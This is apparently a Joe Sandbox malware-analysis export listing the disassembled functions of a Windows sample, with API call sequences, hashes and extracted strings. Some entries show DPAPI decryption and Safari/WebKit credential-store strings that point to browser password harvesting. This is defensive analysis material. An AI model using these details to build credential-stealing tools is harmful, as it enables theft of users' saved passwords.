                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                                                                                                    • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                                    • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1213725291-0
                                                                                                                                                                                                                                    • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                                                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75C4DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                                                                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                                                                    • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: NtdllProc_Window
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4255912815-0
                                                                                                                                                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                                    • API String ID: 2929817778-1134094380
                                                                                                                                                                                                                                    • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                                    • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                                    • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                                    • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                                    APIs
